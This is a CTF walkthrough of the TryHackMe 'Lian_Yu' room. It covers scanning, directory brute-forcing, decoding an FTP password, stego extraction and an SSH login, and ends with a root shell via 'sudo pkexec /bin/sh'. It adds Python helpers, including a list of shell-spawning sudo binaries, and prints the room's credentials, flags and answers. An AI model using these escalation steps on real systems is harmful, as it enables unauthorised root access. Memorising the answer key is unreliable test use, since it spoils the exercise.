riyyoo/TryHackMe-Lian_Yu-Walkthrough

Lian_Yu - TryHackme Writeup Walkthrough

Room link : https://tryhackme.com/room/lianyu

1. Scanning the IP

nmap -sC -sV 10.10.228.22

(-sC runs the default NSE scripts and -sV probes for service versions, which is how the vsftpd/OpenSSH versions below are identified.)

Ports found ---
port 21/tcp - FTP - (vsftpd 3.0.2)
port 22/tcp - SSH - (OpenSSH 6.7p1)
port 80/tcp - HTTP - (Apache httpd)
port 111/tcp - RPC - (rpcbind)

2. Enumeration

Visit the IP in the browser first: http://10.10.228.22/

Now run gobuster for hidden directories.
gobuster dir -u http://10.10.228.22/ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt

Found a directory : /island
Now go to the browser and open http://10.10.228.22/island

Find the Code Word by highlighting the page text (it is styled so it does not show until selected) or by viewing the page source.
Code Word - 'vigilante' - (this is our FTP username)
Again run gobuster, this time against the /island directory, to discover a further directory.
gobuster dir -u http://10.10.228.22/island -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt

Here we found another directory : /2100 -- (What is the Web Directory you found?)
Now do the same again: go to the browser and open http://10.10.228.22/island/2100

View the page source --

The source says there is a file with a '.ticket' extension.
Now run gobuster again, this time looking for files with that extension (-x .ticket).
gobuster dir --url http://10.10.228.22/island/2100 --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .ticket

Found a file : /green_arrow.ticket -- (what is the file name you found?)
Again, in the browser, open http://10.10.228.22/island/2100/green_arrow.ticket

The ticket contains an encoded string : 'RTy8yhBQdscX' . Let's decode it ---

Go to https://gchq.github.io/CyberChef/

Use 'From Base58' to decode it. (The string contains none of 0, O, I, l, + or /, which hints at Base58 rather than Base64; decoding it as Base64 gives non-printable bytes.)

Decoded, it gives '!#th3h00d' - This is the FTP Password. -- (what is the FTP Password?)
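The same decode done locally, as an added example that is not part of the original walkthrough. It implements Base58 with the Bitcoin alphabet (CyberChef's default for 'From Base58') and adds the alphabet triage a practitioner does by eye: work out which encodings a string can even be, then try the decoders in order and keep the first result that is printable. The Base64 test string below is a constructed encoding of the same password, not something found in the room.

```python
"""Decode the Base58 string from green_arrow.ticket without CyberChef.

Added example for this walkthrough, not code from the original page. Uses the
Bitcoin Base58 alphabet, which is what CyberChef's 'From Base58' defaults to.
"""
import base64
import binascii
import string

BASE58_ALPHABET = b"123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"


def b58decode(text: str) -> bytes:
    """Base58 (Bitcoin alphabet) to bytes; leading '1's become leading NUL bytes."""
    value = 0
    for ch in text.encode("ascii"):
        digit = BASE58_ALPHABET.find(ch)
        if digit < 0:
            raise ValueError(f"not a Base58 character: {chr(ch)!r}")
        value = value * 58 + digit
    body = value.to_bytes((value.bit_length() + 7) // 8, "big") if value else b""
    leading = len(text) - len(text.lstrip("1"))
    return b"\x00" * leading + body


def b58encode(raw: bytes) -> str:
    """Inverse of b58decode, useful to confirm a decode round-trips."""
    leading = len(raw) - len(raw.lstrip(b"\x00"))
    value = int.from_bytes(raw, "big")
    digits = bytearray()
    while value:
        value, rem = divmod(value, 58)
        digits.append(BASE58_ALPHABET[rem])
    return "1" * leading + digits[::-1].decode("ascii")


def candidate_encodings(text: str) -> list:
    """Encodings whose alphabet the string fits, most restrictive first."""
    cands = []
    if text and set(text) <= set(string.hexdigits) and len(text) % 2 == 0:
        cands.append("hex")
    if text and set(text) <= set(BASE58_ALPHABET.decode("ascii")):
        cands.append("base58")
    if text and set(text) <= set(string.ascii_letters + string.digits + "+/="):
        cands.append("base64")
    return cands


def decode_printable(text: str):
    """Try each candidate decoder; return (encoding, bytes) for the first
    decoding that is printable ASCII, or None if nothing looks like text."""
    for enc in candidate_encodings(text):
        try:
            if enc == "hex":
                raw = bytes.fromhex(text)
            elif enc == "base58":
                raw = b58decode(text)
            else:
                raw = base64.b64decode(text, validate=True)
        except (ValueError, binascii.Error):
            continue
        if raw and all(0x20 <= b < 0x7F for b in raw):
            return enc, raw
    return None


if __name__ == "__main__":
    # The string from green_arrow.ticket, as found in the room.
    print(decode_printable("RTy8yhBQdscX"))  # ('base58', b'!#th3h00d')
```

The alphabet check alone cannot tell Base58 from Base64 here (the string fits both), which is why the decoder tries each and keeps the printable result; the Base64 attempt is rejected because its first bytes are not ASCII text.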

3. Now the FTP Login

Now that we have the username and password ---
Username - vigilante
password - !#th3h00d

We can log in to the FTP service -

Once logged in, we find two users on the box: 'vigilante' (our FTP user) and 'slade'.
Also found 3 image files on the server. Download them to your machine with the ftp client's get command (switch to binary mode first so the images are not mangled) ---


Viewing the image files, 'Leave.me.alone.png' does not open, and exiftool reports 'File Format error'.

Checking the file header in a hex editor shows that the PNG signature (the first 8 bytes of the file) is wrong.


The correct header -- https://en.wikipedia.org/wiki/Portable_Network_Graphics

Now let's change it: overwrite the first 8 bytes with the correct PNG signature, 89 50 4E 47 0D 0A 1A 0A (any hex editor will do).

Now the image opens, and it shows a password : 'password'
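The header repair as a script, added here as an example rather than code from the original walkthrough. It checks the 8-byte signature and then parses the first chunk, which a PNG requires to be an IHDR with a valid CRC-32: if that chunk checks out, the only thing wrong is the magic number and patching it is safe; if it does not, the file is damaged beyond the signature and a blind patch would just hide that. The bytes that were actually wrong in Leave.me.alone.png are not reproduced; SAMPLE_BROKEN is a constructed minimal PNG header with a trampled signature.

```python
"""Check and repair a damaged PNG signature, as done for Leave.me.alone.png.

Added example for this walkthrough, not code from the original page. The
sample bytes below are constructed, not taken from the room's file.
"""
import struct
import sys
import zlib

PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"  # 89 50 4E 47 0D 0A 1A 0A


def ihdr_chunk(width: int, height: int) -> bytes:
    """Build a valid IHDR chunk (8-bit RGB, no interlace) with its CRC-32."""
    data = struct.pack(">IIBBBBB", width, height, 8, 2, 0, 0, 0)
    crc = zlib.crc32(b"IHDR" + data) & 0xFFFFFFFF
    return struct.pack(">I", len(data)) + b"IHDR" + data + struct.pack(">I", crc)


def check_png(data: bytes) -> dict:
    """Report on the signature and on the first chunk, which must be a valid IHDR."""
    report = {"signature_ok": data[:8] == PNG_SIGNATURE,
              "ihdr_ok": False, "width": None, "height": None}
    if len(data) < 8 + 4 + 4 + 13 + 4:  # signature plus one complete IHDR chunk
        return report
    length = struct.unpack(">I", data[8:12])[0]
    if len(data) < 20 + length:  # declared length runs past the file: corrupt
        return report
    ctype = data[12:16]
    body = data[16:16 + length]
    stored_crc = struct.unpack(">I", data[16 + length:20 + length])[0]
    if ctype == b"IHDR" and length == 13 and zlib.crc32(ctype + body) & 0xFFFFFFFF == stored_crc:
        report["ihdr_ok"] = True
        report["width"], report["height"] = struct.unpack(">II", body[:8])
    return report


def can_repair(data: bytes) -> bool:
    """True when only the signature is wrong and the rest parses as a PNG."""
    return check_png(PNG_SIGNATURE + data[8:])["ihdr_ok"]


def repair_png_signature(data: bytes) -> bytes:
    """Overwrite the first 8 bytes with the correct signature, or refuse if
    the IHDR chunk does not check out (then the damage is more than the magic)."""
    if not can_repair(data):
        raise ValueError("IHDR missing or corrupt; a signature patch alone will not fix this file")
    return PNG_SIGNATURE + data[8:]


# Constructed sample: correct IHDR for a 640x480 image, signature trampled.
SAMPLE_BROKEN = b"\x89\x00\x00\x00\x0d\x0a\x1a\x0a" + ihdr_chunk(640, 480)

if __name__ == "__main__":
    # Usage: python3 fixpng.py Leave.me.alone.png fixed.png
    with open(sys.argv[1], "rb") as f:
        raw = f.read()
    print("before:", check_png(raw))
    fixed = repair_png_signature(raw)
    with open(sys.argv[2], "wb") as f:
        f.write(fixed)
    print("after: ", check_png(fixed))
```

The IHDR check is what separates "exiftool says File Format error because the magic is wrong" from a genuinely truncated or corrupted image; the width and height it returns are also a quick sanity check that the chunk data is real.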


Now let's use steghide to extract any hidden files within the other image files (it prompts for a passphrase).
steghide extract -sf aa.jpg


Using the password 'password' from the PNG, steghide extracts a file ss.zip from aa.jpg.
Unzipping ss.zip gives a 'passwd.txt' and a 'shado' file.


Now cat the 'shado' file and you get a password : 'M3tahuman' -- (this is the SSH password) --- (what is the file name with SSH password?)


4. SSH Login

Now that we have the SSH password, we can log in as slade --
User - slade
password - M3tahuman
ssh slade@10.10.228.22


Now that you're logged in, look for the user.txt flag --
slade@LianYu:~$ ls
user.txt


user.txt - 'THM{P30P7E_K33P_53CRET5__C0MPUT3R5_D0N'T}'

5. Root Privilege Escalation

To find which commands slade may run with root privileges via sudo, run: ---
sudo -l

sudo -l asks for slade's password again -- use the same one, 'M3tahuman'.


The output shows that slade may run '/usr/bin/pkexec' as root. pkexec executes whatever program it is given, so passing it '/bin/sh' drops us straight into a root shell:
sudo pkexec /bin/sh
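Reading sudo -l output for entries like this one is routine enough to script. Below is an added example, not code from the original walkthrough, that parses the "may run the following commands" block and flags any entry run as root whose binary is known to spawn a shell (a short hand-picked subset of what GTFOBins documents; extend SHELL_SPAWNERS as needed). SAMPLE_SUDO_L is constructed to match what the walkthrough describes (slade may run /usr/bin/pkexec as root) plus two extra entries to exercise the NOPASSWD tag and a non-root run-as; it is not a capture from the machine.

```python
"""Triage `sudo -l` output for entries that hand out a root shell.

Added example for this walkthrough, not code from the original page. The
sample output is constructed; SHELL_SPAWNERS is a hand-picked subset of the
binaries GTFOBins lists as able to spawn a shell under sudo.
"""
import re

SHELL_SPAWNERS = {
    "pkexec", "bash", "sh", "dash", "zsh", "env", "find", "awk", "vim", "vi",
    "less", "more", "python", "python3", "perl", "ruby", "nmap", "tar", "zip",
}

# One sudoers entry as printed by `sudo -l`:
#   (runas_user : runas_group) [TAG: ...] /path/one, /path/two args
ENTRY_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$")

# Constructed sample modelled on the room; not a real capture.
SAMPLE_SUDO_L = """\
Matching Defaults entries for slade on LianYu:
    env_reset, mail_badpass

User slade may run the following commands on LianYu:
    (ALL : ALL) /usr/bin/pkexec
    (root) NOPASSWD: /usr/bin/less /var/log/syslog
    (www-data) /usr/bin/find
"""


def parse_sudo_l(output: str) -> list:
    """Return one dict per command listed after 'may run the following commands'."""
    entries = []
    in_commands = False
    for line in output.splitlines():
        if "may run the following commands" in line:
            in_commands = True
            continue
        if not in_commands or not line.strip():
            continue
        m = ENTRY_RE.match(line)
        if not m:
            continue
        runas_user = m.group("runas").split(":")[0].strip()
        tags = {t.rstrip(":") for t in m.group("tags").split()}
        for cmd in m.group("cmds").split(","):
            cmd = cmd.strip()
            if cmd:
                entries.append({"runas": runas_user,
                                "nopasswd": "NOPASSWD" in tags,
                                "command": cmd})
    return entries


def triage(entries: list) -> list:
    """Return (command, reason) for entries that yield a root shell."""
    findings = []
    for e in entries:
        if e["runas"] not in ("ALL", "root"):
            continue  # runs as an unprivileged user; not a root path by itself
        if e["command"] == "ALL":
            findings.append((e["command"], "any command as root"))
            continue
        name = e["command"].split()[0].rsplit("/", 1)[-1]
        if name in SHELL_SPAWNERS:
            findings.append((e["command"], f"{name} can spawn a shell as root (see GTFOBins)"))
    return findings


def root_shell_candidates(output: str) -> list:
    """Parse then triage in one call."""
    return triage(parse_sudo_l(output))


if __name__ == "__main__":
    for command, reason in root_shell_candidates(SAMPLE_SUDO_L):
        print(f"[!] {command}: {reason}")
```

Note that the pkexec entry is flagged for the same reason as bash or find would be: sudo already grants root, and pkexec simply runs the program it is handed. The NOPASSWD tag only changes whether a password is needed, not whether the entry is dangerous.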


root.txt - 'THM{MY_W0RD_I5_MY_B0ND_IF_I_ACC3PT_YOUR_CONTRACT_THEN_IT_WILL_BE_COMPL3TED_OR_I'LL_BE_D34D}'
Submit the flags

What is the pkexec vulnerability ?

-- CVE-2021-4034 ("PwnKit") is a memory-corruption bug in Polkit's pkexec that has been weaponized in the wild. It is present in the default configuration of all major Linux distributions and lets any local user gain full root privileges; Red Hat describes it as a flaw in pkexec that allows an authenticated user to perform a privilege escalation attack. Note that the escalation used in this room does not depend on that CVE: the sudo rule already lets slade run /usr/bin/pkexec as root, and pkexec simply executes the program it is given, so 'sudo pkexec /bin/sh' yields a root shell even on a fully patched box.

I hope this was helpful.

thanks.

Answer the questions below
Deploy the VM and Start the Enumeration.
--No answer needed

What is the Web Directory you found?
-- 2100

what is the file name you found?
--green_arrow.ticket

what is the FTP Password?
--!#th3h00d

what is the file name with SSH password?
--shado

user.txt
--THM{P30P7E_K33P_53CRET5__C0MPUT3R5_D0N'T}

root.txt
--THM{MY_W0RD_I5_MY_B0ND_IF_I_ACC3PT_YOUR_CONTRACT_THEN_IT_WILL_BE_COMPL3TED_OR_I'LL_BE_D34D}